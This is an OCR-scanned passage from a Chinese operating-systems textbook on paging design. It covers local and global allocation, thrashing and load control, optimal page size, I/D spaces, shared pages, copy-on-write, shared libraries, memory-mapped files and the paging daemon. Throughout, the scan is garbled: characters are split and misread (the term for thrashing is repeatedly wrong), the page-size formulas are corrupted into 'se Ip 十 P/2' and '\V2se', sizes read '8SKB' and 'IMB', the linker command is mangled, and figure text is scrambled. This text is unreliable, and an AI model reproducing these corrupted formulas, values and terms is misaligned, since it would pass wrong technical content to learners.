够 将 所 有 内 存 中 最 老 的 页 面 置换 掉 (全 局 算法 )， 也 
能 将 当前 进程 的 页 面 中 最 老 的 替换 掉 (局 部 算法 )。 
相似 地 ，LRU 或 是 一 些 类 似 算法 能 够 将 所 有 内 存 中 最 
近 最 少 访问 的 页 面 替换 掉 (全 局 算法 ) ， 或 是 将 当前 
进程 中 最 近 最 少 使 用 的 页 面 替 换 掉 (局 部 算法 )。 在 
某 些 情况 下 ， 选 择 局 部 策略 还 是 全 局 策略 是 与 页 面 置 图 3-23 缺 页 中 断 率 是 分 配 的 页 框 数 的 函数 
换算 法 无 关 的 。 

另 一 方面 ， 对 于 其 他 的 页 面 置 换算 法 ， 只 有 采用 局 部 策略 才 有 意义 。 特 别 是 工作 集 和 WSClock 算 法 
是 针对 某 些 特定 进程 的 而 且 必须 应 用 在 这 些 进程 的 上 下 文中 。 实 际 上 没有 针对 整个 机 器 的 工作 集 ， 并 且 
试图 使 用 所 有 工作 和 集 的 并 集 作为 机 器 的 工作 集 可 能 会 丢失 一 些 局 部 特性 ， 这 样 算法 就 不 能 达到 好 的 性 能 。 


3.5.2 负载 控制 
即使 是 使 用 最 优 页 面 置 换算 法 并 对 进程 采用 理想 的 全 局 页 框 分 配 ， 系 统 也 可 能 会 发 生 颠 徐 。 事 实 上 ， 
一 旦 所 有 进程 的 组 合 工作 集 超出 了 内 存 容量 , MIEREN. 该 现象 的 症状 之 一 就 是 如 PFF 算 法 所 指出 的 ， 
一 些 进程 需要 更 多 的 内 存 ， 但 是 没有 进程 需要 更 少 的 内 存 。 在 这 种 情况 下 ， 没 有 方法 能 够 在 不 影响 其 他 进 
程 的 情况 下 满足 那些 需要 更 多 内 存 的 进程 的 需要 。 唯 一 现实 的 解决 方案 就 是 暂时 从 内 存 中 去 掉 一 些 进程 。 
减少 竞争 内 存 的 进程 数 的 一 个 好 方法 是 将 一 部 分 进程 交换 到 磁盘 ， 并 释放 他 们 所 占有 的 所 有 页 面 。 
例如 ， 一 个 进程 可 以 被 交换 到 磁盘 ， 而 它 的 页 框 可 以 被 其 他 处 于 颠 纂 状态 的 进程 分 享 。 如 果 茵 得 停 止 ， 系 
统 就 能 够 这 样 运行 一 段 时 间 。 如 果 颠 签 没 有 结束 ， 需 要 继续 将 其 他 进程 交换 出 去 ， 直 到 苏 徐 结束 。 因 此 ， 
即使 是 使 用 分 页 ， 交 换 也 是 需要 的 ， 只 是 现在 交换 是 用 来 减少 对 内 存 潜 在 的 需求 ， 而 不 是 收回 它 的 页 面 。 
将 进程 交换 出 去 以 减轻 内 存 需 求 的 压力 是 借用 了 两 级 调度 的 思想 ， 在 此 过 程 中 一 些 进程 被 放 到 磁盘 ， 此 
时 用 一 个 短期 的 调度 程序 来 调度 剩余 的 进程 。 很 明显 ， 这 两 种 思路 可 以 被 组 合 起 来 ， 将 恰好 足够 的 进程 交换 
出 去 以 获取 可 接受 的 缺 页 中 断 率 。 一 些 进程 被 周期 性 地 从 磁盘 调 入 ， 而 其 他 一 些 则 被 周期 性 地 交换 到 磁盘 。 
不 过 ， 另 一 个 需要 考虑 的 因素 是 多 道 程序 设计 的 道 数 。 当 内 存 中 的 进程 数 过 低 的 时 候 ，CPU 可 能 在 
很 长 的 时 间 内 处 于 空闲 状态。 考虑 到 该 因素 ， 在 决定 交换 出 哪个 进程 时 不 光 要 考虑 进程 大 小 和 分 页 率 ， 
还 要 考虑 它 的 特性 (如 它 究竟 是 CPU 窗 集 型 还 是 1/0 密 集 型 ) 以 及 其 他 进程 的 特性 。 


3.5.3 页 面 大 小 

页 面 大 小 是 操作 系统 可 以 选择 的 一 个 参数 。 例 如 ， 即 使 硬件 设计 只 支持 4096 字 节 的 页 面 ， 操 作 系统 
也 可 以 很 容易 通过 总 是 为 页 面 对 0 和 1、2 和 3、4 和 5 等 分 配 两 个 连续 的 8192 字 节 的 页 框 ， 而 将 其 作为 8SKB 
的 页 面 。 

要 确定 最 佳 的 页 面 大 小 需要 在 几 个 互相 矛盾 的 因素 之 间 进 行 权衡 。 从 结果 看 ， 不 存在 全 局 最 优 。 首 
先 ， 有 两 个 因素 可 以 作为 选择 小 页 面 的 理由 。 随 便 选择 一 个 正文 段 、 数 据 段 或 堆栈 段 很 可 能 不 会 恰好 装 
满 整 数 个 页 面 ， 平 均 的 情况 下 ， 最 后 一 个 页 面 中 有 一 半 是 空 的 。 多 余 的 空间 就 被 浪费 掉 了 ， 这 种 浪费 称 
为 内 部 碎片 (internal fragmentation)。 在 内 存 中 有 n 个 段 、 页 面 大 小 为 p 字 节 时 ， 会 有 np/2 字 节 被 内 部 碎 
片 浪费 。 从 这 方面 考虑 ， 使 用 小 页 面 更 好 。 

选择 小 页 面 还 有 一 个 明显 的 好 处 ， 考 虑 一 个 程序 ， 它 分 成 8 个 阶段 顺序 执行 ， 每 阶段 需要 4KB 内 存 。 
如 果 页 面 大 小 是 32KB ， 那 就 必须 始终 给 程序 分 配 32KB 内 存 。 如 果 页 面 大 小 是 16KB ， 它 就 只 需要 16KB。 
如 果 页 面 大 小 是 4KB 或 更 小 ， 那 么 在 任何 时 刻 它 只 需要 4KB 内 存 。 总 的 来 说 ， 大 尺寸 页 面 比 小 尺寸 页 面 
浪费 了 更 多 内 存 。 

另 一 方面 ， 页 面 小 意味 着 程序 需要 更 多 的 页 面 ， 这 又 意味 着 需要 更 大 的 页 表 。 一 个 32KB 的 程序 只 
需要 4 个 8KB 的 页 面 ， 却 需要 64 个 512 字 节 的 页 面 。 内 存 与 磁盘 之 间 的 传输 一 般 是 一 次 一 页 ， 传 输 中 的 大 
部 分 时 间 都 花 在 了 寻 道 和 旋转 延迟 上 ， 所 以 传输 一 个 小 页 面 所 用 的 时 间 和 传输 一 个 大 页 面 基本 上 是 相同 
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的 。 装 入 64 个 512 字 节 的 页 面 可 能 需要 64 x 10ms， 而 装 入 4 个 8KB 的 页 面 可 能 只 需要 4x 12ms, 

此 外 ， 小 页 面 能 够 更 充分 地 利用 TLB 空 间 。 假 设 程序 使 用 的 内 存 为 IMB， 工 作 单元 为 64KB。 若 使 
用 4KB 的 页 ， 则 程序 将 至 少 占用 TLB 中 的 16 个 表 项 ， 而 使 用 2MB 的 页 时 ，1 个 TLB 表 项 就 足够 了 (理论 
上 ， 你 还 可 以 将 数据 和 指令 分 离开 来 )。 由 于 TLB 表 项 相对 稀缺 ， 且 对 于 性 能 而 言 至 关 重要 ， 因 此 在 条 
件 允 许 的 情况 下 使 用 大 页 面 是 值得 的 。 为 了 进行 必要 的 平衡 ， 操 作 系 统 有 时 会 为 系统 中 的 不 同 部 分 使 用 
不 同 的 页 面 大 小 。 例 如 ， 内 核 使 用 大 页 面 ， 而 用 户 进 程 则 使 用 小 页 面 。 

在 某 些 机 器 上 , 每 次 CPU 从 一 个 进程 切换 到 另 一 个 进程 时 都 必须 把 新 进程 的 页 表 装 和 人 硬件 寄存 器 中 。 
这 样 ， 页 面 越 小 意味 着 装 入 页 面 寄存 器 花费 的 时 间 就 会 越 长 ， 而 且 页 表 占 用 的 空间 也 会 随 着 页 面 的 减 小 
而 增 大 。 

最 后 一 点 可 以 从 数学 上 进行 分 析 ， 假 设 进程 平均 大 小 是 个 字 节 ， 页 面 大 小 是 z 个 字 节 ， 每 个 页 表 项 
需要 e 个 字 节 。 那 么 每 个 进程 需要 的 页 数 大 约 是 s/p， 占 用 了 selp 个 字 节 的 页 表 空 间 。 内 部 碎片 在 最 后 一 
页 浪费 的 内 存 是 p/2。 因 此 ， 由 页 表 和 内 部 碎片 损失 造成 的 全 部 开销 是 以 下 两 项 之 和 : 

F =se Ip 十 P/2 
在 页 面 比较 小 的 时 候 ， 第 一 项 (页 表 大 小 ) 大 。 在 页 面 比较 大 时 第 二 项 (内 部 碎片 ) 大 。 最 优 值 一 
定 在 页 面 大 小 处 于 中 间 的 某 个 值 时 取得 ， 通 过 对 p 一 次 求 导 并 令 右 边 等 于 零 ， 得 到 方程 : 
—se / p?+1/2=0 
从 这 个 方程 可 以 得 出 最 优 页 面 大 小 的 公式 〈 只 考虑 碎片 浪费 和 页 表 所 需 的 内 存 ) ， 结 果 是 : 
P = \V2se 

对 于 s = 1MB 和 每 个 页 表 项 e = 8B， 最 优 页 面 大 小 是 4KB。 商 用 计算 机 使 用 的 页 面 大 小 一般 在 512B 

到 64KB 之 间 ， 以 前 的 典型 值 是 1KB， 而 现在 更 常见 的 页 面 大 小 是 4 KB 或 8KB。 


3.5.4 分 离 的 指令 空间 和 数据 空间 
大 多 数 计算 机 只 有 一 个 地 址 空间 ， 既 存放 程序 也 存放 数据 ， 如 图 3-24a 所 示 。 如 果 地 址 空间 足够 大 ， 
那么 一 切 都 好 。 然 而 ， 地 址 空间 通常 太 小 了 ， 这 就 使 得 程序 员 对 地 址 空间 的 使 用 出 现 困难 。 


,单个 地 址 空间 oT D 空 间 





} 未 使 用 页 面 


数据 





图 3-24 a) 单个 地 址 空间 ，b) 分 离 的 I 空间 和 D 空 间 


首先 在 PDP-11 (16 位 ) 上 实现 的 一 种 解决 方案 是 ， 为 指令 (程序 正文 ) 和 数据 设置 分 离 的 地 址 空 
间 ， 分 别称 为 | 空间 和 D 空 间 ， 如 图 3-24b 所 示 。 每 个 地 址 空间 都 从 0 开始 到 某 个 最 大 值 ， 比 较 有 代表 性 的 
是 2 一 1 或 者 2 一 1。 链 接 器 必须 知道 何 时 使 用 分 离 的 I 空 间 和 D 空 间 ， 因 为 当 使 用 它们 时 ， 数 据 被 重 定位 
到 虚拟 地 址 0， 而 不 是 在 程序 之 后 开始 。 

在 使 用 这 种 设计 的 计算 机 中 ， 两 种 地 址 空间 都 可 以 进行 分 页 ， 而 且 互 相 独 立 。 它 们 分 别 有 自 己 的 页 
表 ， 分 别 完成 虚拟 页 面 到 物理 页 框 的 映射 。 当 硬件 进行 取 指令 操作 时 ， 它 知道 要 使 用 I 空间 和 I 空间 页 表 。 
类 似 地 ， 对 数据 的 访问 必须 通过 D 空 间 页 表 。 除 了 这 一 区 别 ， 拥 有 分 离 的 I 空间 和 DD 空间 不 会 引入 任何 复 
杂 的 设计 ， 而 且 它 还 能 使 可 用 的 地 址 空间 加 倍 。 

尽管 现在 的 地 址 空间 已 经 很 大 ， 但 其 大 小 曾 是 一 个 很 严重 的 问题 。 即 便 是 在 今天 把 地 址 空间 划分 成 
I 和 D 层 也 很 常见 。 现 在 的 地 址 空间 经 常 被 划分 到 一 级 缓存 里 ， 而 不 再 分 给 常规 的 地 址 空间 。 毕 竟 在 一 级 
缓存 中 ， 内 存 也 是 个 稀缺 品 。 
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355 共享 页 面 
另 一 个 设计 问题 是 共享 。 在 大 型 多 道 程序 设计 系统 中 ， 几 个 不 同 的 用 户 同时 运行 同一 个 程序 是 很 常 
见 的 。 显然， 由 于 避免 了 在 内 存 中 有 一 个 页 
面 的 两 份 副本 ， 共 享 页 面 效率 更 高 。 这 里 存 
在 一 个 问题 ， 即 并 不 是 所 有 的 页 面 都 适合 共 
享 。 特 别 地 ， 那 些 只 读 的 页 面 (诸如 程序 文 
本 ) 可 以 共享 ， 但 是 数据 页 面 则 不 能 共享 。 
如 果 系 统 支 持 分 离 的 I 空间 和 D 空 间 ， 那 
么 让 两 个 或 者 多 个 进程 来 共享 程序 就 变 得 非 
常 简单 了 ， 这 些 进 程 使 用 相同 的 I 空间 页 表 和 
不 同 的 D 空 间 页 表 。 在 一 个 比较 典型 的 使 用 这 











种 方式 来 支持 共享 的 实现 中 ， 页 表 与 进程 表 Se 

数据 结构 无 关 。 每 个 进程 在 它 的 进程 表 中 都 一 一 

有 两 个 指针 : 一 个 指向 I 空 间 页 表 ， 一 个 指向 "E Pore PER 
D 空 间 页 表 ， 如 图 3-25 所 示 。 当 调度 程序 选择 € A $ 
一 个 进程 运行 时 ， 它 使 用 这 些 指针 来 定位 合 页 表 


适 的 页 表 ， 并 使 用 它们 来 设立 MMU。 即 使 没 
有 分 离 的 I 空间 和 DD 空间， 进程 也 可 以 共享 程 
FE (或 者 有 时 为 库 )， 但 要 使 用 更 为 复杂 的 机 制 。 

在 两 个 或 更 多 进程 共享 某 些 代码 时 ， 在 共享 页 面 上 存在 一 个 问题 。 假 设 进程 A 和 进程 B 同 时 运行 一 
个 编辑 器 并 共享 页 面 。 如 果 调 度 程序 决定 从 内 存 中 移 走 A， 撤 销 其 所 有 的 页 面 并 用 一 个 其 他 程序 来 填充 
这 些 空 的 页 框 ， 则 会 引起 B 产 生 大 量 的 缺 页 中 断 ， 才 能 把 这 些 页 面 重 新 调 入 。 

类 似 地 ， 当 进程 A 结束 上 时， 能够 发 现 这 些 页 面 仍 然 在 被 使 用 是 非常 必要 的 ， 这 样 ， 这 些 页 面 的 磁盘 
空间 才 不 会 被 随意 释放 。 查 找 所 有 的 页 表 ， 考 察 一 个 页 面 是 否 共享 ， 其 代价 通常 比较 大 ， 所 以 需要 专门 
的 数据 结构 记录 共享 页 面 ， 特 别 地 ， 如 果 共 享 的 单元 是 单个 页 面 (或 一 批 页 面 ) ， 而 不 是 整个 页 表 。 

共享 数据 要 比 共享 代码 麻烦 ， 但 也 不 是 不 可 能 。 特 别 是 在 UNIX 中 ， 在 进行 fork 系 统 调用 后 ， 父 进 
程 和 子 进程 要 共享 程序 文本 和 数据 。 在 分 页 系统 中 ， 通 常 是 让 这 些 进程 分 别 拥 有 它们 自己 的 页 表 ， 但 都 
指向 同一 个 页 面 集合 。 这 样 在 执行 fork 调 用 时 就 不 需要 进行 页 面 复制 。 然 而 ， 所 有 了 映射 到 两 个 进程 的 数 
据 页 面 都 是 只 读 的 。 

只 要 这 两 个 进程 都 仅仅 是 读数 据 ， 而 不 做 更 改 ， 这 种 情况 就 可 以 保持 下 去 。 但 只 要 有 一 个 进程 更 新 
了 一 点 数据 ， 就 会 触发 只 读 保护 ， 并 引发 操作 系统 陷阱 。 然 后 会 生成 一 个 该 页 的 副本 ， 这 样 每 个 进程 都 
有 自己 的 专用 副本 。 两 个 复制 都 是 可 以 读 写 的 ， 随 后 对 任何 一 个 副本 的 写 操作 都 不 会 再 引发 陷阱 。 这 种 
策略 意味 着 那些 从 来 不 会 执行 写 操作 的 页 面 (包括 所 有 程序 页 面 ) 是 不 需要 复制 的 ， 只 有 实际 修改 的 数 
据 页 面 需要 复制 。 这 种 方法 称 为 写 时 复制 ， 它 通过 减少 复制 而 提高 了 性 能 。 


3.5.6 共享 库 

可 以 使 用 其 他 的 粒度 取代 单个 页 面 来 实现 共享 。 如 果 一 个 程序 被 启动 两 次 ， 大 多 数 操作 系统 会 自动 
共享 所 有 的 代码 页 面 ， 而 在 内 存 中 只 保留 一 份 代码 页 面 的 副本 。 代 码 页 面 总 是 只 读 的 ， 因 此 这 样 做 不 存 
在 任何 问题 。 依 赖 于 不 同 的 操作 系统 ， 每 个 进程 都 拥有 一 份 数据 页 面 的 私有 副本 ， 或 者 这 些 数 据 页 面 被 
共享 并 且 被 标记 为 只 读 。 如 果 任 何 一 个 进程 对 一 个 数据 页 面 进行 修改 ， 系 统 就 会 为 此 进程 复制 这 个 数据 
页 面 的 一 个 副本 ， 并 且 这 个 副本 是 此 进程 私有 的 ， 也 就 是 说 会 执行 “ 写 时 复制 ”。 

现代 操作 系统 中 ， 有 很 多 大 型 库 被 众多 进程 使 用 ， 例如， 处 理 浏 览 文 件 以 便 打开 文件 的 对 话 框 的 库 和 
多 个 图 形 库 。 把 所 有 的 这 些 库 静 态 地 与 磁盘 上 的 每 一 个 可 执行 程序 绑 定 在 一 起 ， 将 会 使 它们 变 得 更 加 庞大 。 

一 个 更 加 通用 的 技术 是 使 用 共享 库 (在 Windows 中 称 作 DLL 或 动态 链接 库 ) 。 为 了 清楚 地 表达 共享 
库 的 思想 ， 首 先 考 虑 一 下 传统 的 链接 。 当 链接 一 个 程序 时 ， 要 在 链接 器 的 命令 中 指定 一 个 或 多 个 目标 文 
件 ， 可 能 还 包括 一 些 库 文件 。 以 下 面 的 UNIX 命 令 为 例 : 


图 3-25 两 个 进程 通过 共享 程序 页 表 来 共享 同一 个 程序 
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Id *.o -lc -Im 


这 个 命令 会 链接 当前 目录 下 的 所 有 的 .o (目标 ) 文件 ， 并 扫描 两 个 库 : /usr/lib/libc.a 和 /usr/lib/libm.a。 任 
何在 目标 文件 中 被 调用 了 但 是 没有 被 定义 的 函数 (比如 ，printf) ， 都 被 称 作 未 定义 外 部 函数 (undefined 
externals) 。 链 接 器 会 在 库 中 寻找 这 些 未 定义 外 部 函数 。 如 果 找 到 了 ， 则 将 它们 加 载 到 可 执行 二 进 制 文件 
中 。 任 何 被 这 些 未 定义 外 部 函数 调用 了 但 是 不 存在 的 函数 也 会 成 为 未 定义 外 部 函数 。 例 如 ，printf 需 要 
write， 如 果 write 还 没有 被 加 载 进来 ， 链 接 器 就 会 查找 write 并 在 找到 后 把 它 加 载 进 来 。 当 链接 器 完成 任务 
后 , 一 个 可 执行 二 进 制 文件 被 写 到 磁盘 ， 其 中 包括 了 所 需 的 全 部 函数 。 在 库 中 定义 但 是 没有 被 调用 的 函 
数 则 不 会 被 加 载 进去 。 当 程序 被 装 入 内 存 执 行 时 ， 它 需要 的 所 有 函数 都 已 经 准备 就 绪 了 。 

假设 普通 程序 需要 消耗 20~50MB 用 于 图 形 和 用 户 界面 函数 。 静 态 链接 上 百 个 包括 这 些 库 的 程序 会 
浪费 大 量 的 磁盘 空间 , 在 装载 这 些 程序 时 也 会 浪费 大 量 的 内 存 空间 ， 因 为 系统 不 知道 它 可 以 共享 这 些 库 。 
这 就 是 引入 共享 库 的 原因 。 当 一 个 程序 和 共享 库 (与 静态 库 有 些许 区 别 ) 链接 时 ， 链 接 器 没有 加 载 被 调 
用 的 函数 ， 而 是 加 载 了 一 小 段 能 够 在 运行 时 绑 定 被 调用 函数 的 存根 例 程 (stub routine) 。 依 赖 于 系统 和 
配置 信息 ， 共 享 库 或 者 和 程序 一 起 被 装载 ， 或 者 在 其 所 包含 函数 第 一 次 被 调用 时 被 装载 。 当 然 ， 如 果 其 
他 程序 已 经 装载 了 某 个 共享 库 ， 就 没有 必要 再 次 装载 它 了 一 一 这 正 是 关键 所 在 。 值 得 注意 的 是 ， 当 一 个 
共享 库 被 装载 和 使 用 时 ， 整 个 库 并 不 是 被 一 次 性 地 读 入 内 存 。 而 是 根据 需要 ， 以 页 面 为 单位 装载 的 ， 因 
此 没有 被 调用 到 的 函数 是 不 会 被 装载 到 内 存 中 的 。 

除了 可 以 使 可 执行 文件 更 小 、 节 省 内 存 空间 之 外 ， 共 享 库 还 有 一 个 优点 : 如 果 共 享 库 中 的 一 个 函数 
因为 修正 一 个 bug 被 更 新 了 ， 那 么 并 不 需要 重新 编译 调用 了 这 个 函数 的 程序 。 旧 的 二 进 制 文件 依然 可 以 
正常 工作 。 这 个 特性 对 于 商业 软件 来 说 尤为 重要 ， 因 为 商业 软件 的 源码 不 会 分 发 给 客户 。 例 如 ， 如 果 微 
软 发 现 并 修复 了 某 个 标准 DLL 中 的 安全 错误 ，Windows 更 新 会 下 载 新 的 DLL 来 替换 原 有 文件 ， 所 有 使 用 
这 个 DLL 的 程序 在 下 次 启动 时 会 自动 使 用 这 个 新 版 本 的 DLL。 

不 过 ， 共 享 库 带 来 了 一 个 必须 解决 的 小 问题 ， 如 图 3-26 所 示 。 我 们 看 到 有 两 个 进程 共享 一 个 20KB 
大 小 的 库 (假设 每 一 方 框 为 4KB ) 。 但 是 ， 这 个 库 被 不 同 的 进程 定位 在 不 同 的 地 址 上 ， 大 概 是 因为 程序 
本 身 的 大 小 不 相同 。 在 进程 1 中 ， 库 从 地 址 36K 开 始 ， 在 进程 2 中 则 从 地 址 12K 开 始 。 假 设 库 中 第 一 个 函 
数 要 做 的 第 一 件 事 就 是 跳 转 到 库 的 地 址 16。 如 果 这 个 库 没有 被 共享 ， 它 可 以 在 装载 的 过 程 中 重 定位 ， 就 
会 跳 转 (在 进程 1 中 ) 到 虚拟 地 址 的 36K+16。 注 意 ， 库 被 装载 到 的 物理 地 址 与 这 个 库 是 否 为 共享 库 是 没 
有 任何 关系 的 ， 因 为 所 有 的 页 面 都 被 MMU 硬 件 从 虚拟 地 址 映射 到 了 物理 地 址 。 





图 3-26 两 个 进程 使 用 的 共享 库 


但 是 ， 由 于 库 是 共享 的 ， 因 此 在 装载 时 再 进行 重 定 位 就 行 不 通 了 。 毕 竟 ， 当 进程 2 调用 第 一 个 函数 
时 (在 地 址 12K) ， 跳 转 指令 需要 跳 转 到 地 址 12K+16， 而 不 是 地 址 36K+16。 这 就 是 那个 必须 解决 的 小 问 
题 。 解 决 它 的 一 个 办 法 是 写 时 复制 ， 并 为 每 一 个 共享 这 个 库 的 进程 创建 新 页 面 ， 在 创建 新 页 面 的 过 程 中 
进行 重 定位 。 当 然 ， 这 样 做 和 使 用 共享 库 的 目的 相悖 。 

一 个 更 好 的 解决 方法 是 : 在 编译 共享 库 时 ， 用 一 个 特殊 的 编译 选项 告知 编译 器 ， 不 要 产生 使 用 绝对 
地 址 的 指令 。 相 反 ， 只 能 产生 使 用 相对 地 址 的 指令 。 例 如 ， 几 乎 总 是 使 用 向 前 (或 向 后 ) 跳 转 n 个 字 节 
(与 给 出 具体 跳 转 地 址 的 指令 不 同 ) 的 指令 。 不 论 共享 库 被 放置 在 虚拟 地 址 空间 的 什么 位 置 ， 这 种 指令 
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都 可 以 正确 工作 。 通 过 避免 使 用 绝对 地 址 ， 这 个 问题 就 可 以 被 解决 。 只 使 用 相对 偏 移 量 的 代码 被 称 作 位 
置 无 关 代 码 (position-independent code ) 。 


3.5.7 ”内存 映射 文件 

共享 库 实际 上 是 一 种 更 为 通用 的 机 制 一 一 内 存 映射 文件 (memory-mapped file) 的 一 个 特例 。 这 种 
机 制 的 思想 是 : 进程 可 以 通过 发 起 一 个 系统 调用 ， 将 一 个 文件 映射 到 其 虚拟 地 址 空间 的 一 部 分 。 在 多 数 
实现 中 ， 在 映射 共享 的 页 面 时 不 会 实际 读 和 页面 的 内 容 ， 而 是 在 访问 页 面 时 才 会 被 每 次 一 页 地 读 人 ， 磁 
盘 文 件 则 被 当 作 后 备 存储 。 当 进程 退出 或 显 式 地 解除 文件 映射 时 ， 所 有 被 改动 的 页 面 会 被 写 回 到 磁盘 文 
件 中 。 

内 存 映射 文件 提供 了 一 种 IO 的 可 选 模型 。 可 以 把 一 个 文件 当 作 一 个 内 存 中 的 大 字符 数组 来 访问 ， 
而 不 用 通过 读 写 操作 来 访问 这 个 文件 。 在 一 些 情况 下 ， 程 序 员 发 现 这 个 模型 更 加 便利 。 

如 果 两 个 或 两 个 以 上 的 进程 同时 映射 了 同一 个 文件 ， 它 们 就 可 以 通过 共享 内 存 来 通信 。 一 个 进程 在 
共享 内 存 上 完成 了 写 操作 ， 此 刻 当 另 一 个 进程 在 映射 到 这 个 文件 的 虚拟 地 址 空间 上 执行 读 操作 时 ， 它 就 
可 以 立刻 看 到 上 一 个 进程 写 操作 的 结果 。 因 此 ， 这 个 机 制 提供 了 一 个 进程 之 间 的 高 带宽 通道 ， 而 且 这 种 
应 用 很 普遍 〈 甚 至 扩展 到 用 来 映射 无 名 的 临时 文件 )。 很 显然 ， 如 果 内 存 映射 文件 可 用 ， 共 享 库 就 可 以 
使 用 这 个 机 制 。 


3.5.8 清除 策略 

如 果 发 生 缺 页 中 断 时 系统 中 有 大 量 的 空闲 页 框 ， 此 时 分 页 系统 工作 在 最 佳 状态 。 如 果 每 个 页 框 都 被 
占用 ， 而 且 被 修改 过 的 话 ， 再 换 入 一 个 新 页 面 时 ， 旧 页 面 应 首先 被 写 回 磁盘 。 为 保证 有 足够 的 空闲 页 框 ， 
很 多 分 页 系统 有 一 个 称 为 分 页 守护 进程 (paging daemon) 的 后 台 进 程 ， 它 在 大 多 数 时 候 睡 眼 ， 但 定期 
被 唤醒 以 检查 内 存 的 状态 。 如 果 空 闲 页 框 过 少 ， 分 页 守护 进程 通过 预定 的 页 面 置换 算法 选择 页 面 换 出 内 
存 。 如 果 这 些 页 面 装 入 内 存 后 被 修改 过 ， 则 将 它们 写 回 磁盘 。 

在 任何 情况 下 ,页面 中 原先 的 内 容 都 被 记录 下 来 。 当 需要 使 用 一 个 已 被 淘汰 的 页 面 时 ， 如 果 该 页 框 
还 没有 被 覆盖 ， 将 其 从 空闲 页 框 缓冲 池 中 移出 即 可 恢复 该 页 面 。 保 存 一 定数 目的 页 框 供给 比 使 用 所 有 内 
存 并 在 需要 时 搜索 一 个 页 框 有 更 好 的 性 能 。 分 页 守护 进程 至 少 保证 了 所 有 的 空闲 页 框 是 “干净 ”的 ， 所 
以 空闲 页 框 在 被 分 配 时 不 必 再 急 着 写 回 磁盘 。 

一 种 实现 清除 策略 的 方法 就 是 使 用 一 个 双 指针 时 钟 。 前 指针 由 分 页 守护 进程 控制 。 当 它 指 向 一 个 脏 
页 面 时 ， 就 把 该 页 面 写 回 磁盘 ， 前 指针 向 前 移动 。 当 它 指向 一 个 干净 页 面 时 ， 仅 仅 指针 向 前 移动 。 后 指 
针 用 于 页 面 置换 ， 就 像 在 标准 时 钟 算法 中 一 样 。 现 在 ， 由 于 分 页 守护 进程 的 工作 ， 后 指针 命中 干净 页 面 
的 概率 会 增加 。 


3.5.9 虚拟 内 存 接口 

到 现在 为 止 ， 所 有 的 讨论 都 假定 虚拟 内 存 对 进程 和 程序 员 来 说 是 透明 的 ， 也 就 是 说 ， 它 们 都 可 以 在 
一 台 只 有 较 少 物理 内 存 的 计算 机 上 看 到 很 大 的 虚拟 地 址 空间 。 对 于 不 少 系统 而 言 这 样 做 是 对 的 ， 但 对 于 
一 些 高 级 系统 而 言 ， 程 序 员 可 以 对 内 存 映射 进行 控制 ， 并 可 以 通过 非常 规 的 方法 来 增强 程序 的 行为 。 这 
一 节 将 简短 地 讨论 一 下 这 些 问 题 。 

允许 程序 员 对 内 存 映射 进行 控制 的 一 个 原因 就 是 为 了 允许 两 个 或 者 多 个 进程 共享 同一 部 分 内 存 。 如 
果 程序 员 可 以 对 内 存 区 域 进行 命名 ， 那 么 就 有 可 能 实现 共享 内 存 : 通过 让 一 个 进程 把 一 片 内 存 区 域 的 名 
称 通知 另 一 个 进程 ， 而 使 得 第 二 个 进程 可 以 把 这 片区 域 映射 到 它 的 虚拟 地 址 空间 中 去 。 通 过 两 个 进程 
(或 者 更 多 ) 共享 同一 部 分 页 面 ， 高 带宽 的 共享 就 成 为 可 能 一 一 一 个 进程 往 共 享 内 存 中 写 内 容 而 另 一 个 
从 中 读 出 内 容 。De Bruijn (2011) 描述 了 通信 信道 这 种 复杂 例子 。 

页 面 共享 也 可 以 用 来 实现 高 性 能 的 消息 传递 系统 。 一 般 地 ， 传 递 消息 的 时 候 ， 数 据 被 从 一 个 地 址 空 
间 复 制 到 另 一 个 地 址 空间 ,开销 很 大 。 如 果 进 程 可 以 控制 它们 的 页 面 映 射 , 就 可 以 这 样 来 发 送 一 条 消息 : 
发 送 进程 清除 那些 包含 消息 的 页 面 的 映射 ， 而 接收 进程 把 它们 映射 进来 。 这 里 只 需要 复制 页 面 的 名 字 ， 
而 不 需要 复制 所 有 数据 。 

另外 一 种 高 级 存储 管理 技术 是 分 布 式 共享 内 存 (Feeley 等 人 ，1995，Li，1986，Li 和 Hudak, 
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1989, Zekauskas 等 人 ，1994) 。 该 方法 允许 网 络 上 的 多 个 进程 共享 一 个 页 面 集合 ， 这 些 页 面 可 能 (而 不 
是 必要 的 ) 作为 单个 的 线性 共享 地 址 空间 。 当 一 个 进程 访问 当前 还 没有 映射 进来 的 页 面 时 ， 就 会 产生 缺 
页 中 断 。 在 内 核 空间 或 者 用 户 空间 中 的 缺 页 中 断 处 理 程序 就 会 对 拥有 该 页 面 的 机 器 进行 定位 ， 并 向 它 发 
送 一 条 消息 ， 请 求 它 清除 该 页 面 的 映射 ， 并 通过 网 络 发 送出 来 。 当 页 面 到 达 时 ， 就 把 它 映射 进来 ， 并 重 
新 开始 运行 引起 缺 页 中 断 的 指令 。 在 第 8 章 中 我 们 将 详细 讨论 分 布 式 共享 内 存 。 
3.6 有 关 实 现 的 问题 

实现 虚拟 内 存 系统 要 在 主要 的 理论 算法 (如 第 二 次 机 会 算法 与 老化 算法 ， 局 部 页 面 分 配 与 全 局 页 面 


分 配 ， 请 求 调 页 与 预先 调 页 ) 之 间 进 行 选择 。 但 同时 也 要 注意 一 系列 实际 的 实现 问题 。 在 这 一 节 中 将 涉 
及 一 些 通 常情 况 下 会 遇 到 的 问题 以 及 一 些 解决 方案 。 


3.6.1 与 分 页 有 关 的 工作 

操作 系统 要 在 下 面 的 四 段 时 间 里 做 与 分 页 相关 的 工作 : 进程 创建 时 ， 进 程 执行 时 ， 缺 页 中 断 时 和 进 
程 终止 时 。 下 面 将 分 别 对 这 四 个 时 期 进行 简短 的 分 析 。 

当 在 分 页 系统 中 创建 一 个 新 进程 时 ， 操 作 系统 要 确定 程序 和 数据 在 初始 时 有 多 大 ， 并 为 它们 创建 一 
个 页 表 。 操 作 系统 还 要 在 内 存 中 为 页 表 分 配 空间 并 对 其 进行 初始 化 。 当 进程 被 换 出 时 ， 页 表 不 需要 驻 留 在 
内 存 中 ， 但 当 进 程 运行 时 ， 它 必须 在 内 存 中 。 另 外 ， 操 作 系统 要 在 磁盘 交换 区 中 分 配 空间 ， 以 便 在 一 个 进 
程 换 出 时 在 磁盘 上 有 放置 此 进程 的 空间 。 操 作 系统 还 要 用 程序 正文 和 数据 对 交换 区 进行 初始 化 ， 这 样 当 新 
进程 发 生 缺 页 中 断 时 ， 可 以 调和 需要 的 页 面 。 某 些 系统 直接 从 磁盘 上 的 可 执行 文件 对 程序 正文 进行 分 页 ， 
